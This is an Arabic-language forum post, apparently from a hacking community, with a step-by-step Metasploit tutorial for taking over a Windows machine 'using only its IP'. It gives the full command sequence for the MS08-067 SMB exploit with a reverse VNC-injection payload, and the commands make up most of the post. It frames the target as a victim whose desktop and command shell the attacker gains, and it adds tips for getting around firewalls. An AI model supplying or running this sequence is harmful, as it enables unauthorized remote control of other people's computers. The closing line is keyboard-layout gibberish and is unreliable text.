تحية لكم ياأعضاء ،نسأل الله أن تكونوا على خير حال
اليوم راح نشرح بالصور طريقة إستخدام مشروع الميتا لإختراق أي جهاز باستخدام الأي بي فقط
نتابع .....
نقوم بفتح أداة Metasploit Console وقد تم تطبيق الشرح باستخدام الإصدار 3-3 ، وكما هو متعارف عليه نقوم بأول خطوة وهي إستعراض الإكسبلويتات من خلال الأمر التالي :
كود:
show exploits
الخطوة الثانية نقوم بتحديد الإكسبلويت الذي سيتم إستخدامه وهو :
كود:
use windows/smb/ms08_067_netapi
الأن نقوم بعرض خيارات الثغرة من خلال الأمر التالي:
كود:
show options
ونقوم بتحديد الخيارات من خلال الأوامر التالية:
كود:
set rhost ip بدل كلمة أي بي نضع أي بي الجهاز المستهدف set target 0
بعد ذلك نقوم بإستعراض البايلودز لإختيار المناسب وذلك من خلال الأمر التالي:
كود:
show payloads
وفي هذا الشرح سيتم إستخدام البايلود التالي:
كود:
set payload windows/vncinject/reverse_tcp
الأن نقوم بعرض الخيارات من خلال الأمر التالي:
كود:
show options
وهنا سنقوم بتحديد خيار هوست الإتصال العكسي من خلال ما يلي :
كود:
set lhost ip بدل كلمة أي بي تضع أي بي جهازك
الأن وبعد إكمالنا لكافة الخطوات بقي أن ننفذ أمر تشغيل الثغرة من خلال الأمر التالي :
كود:
exploit
بعد تنفيذ أمر التشغيل سوف يظهر لك بيانات عن جهاز الضحية ونظامة وسوف يتم فتح نافذة دوس للتحكم بجهازة كما سيتم فتح شاشة تصور سطح مكتبة
ملاحظة:قد يواجه التطبيق معوقات مثل جدار الحماية وأيضا عدم وجود المنفذ رقم 445 مفتوحا لدى الجهاز المستهدف وطبعا يمكن تجاوز أي إشكالية من خلال التعديل على البايلود ، كما يمكن إستخدام الإصدار رقم 3-2 فهو مناسب لتنفيذ الثغرة بشكل أفضل
نسأل الله أن نكون قد وفقنا في طرح الموضوع ونأسف على أي تقصير ،
Yojvhr [ih. hgqpdm fH]hm hgldjhsfg,hj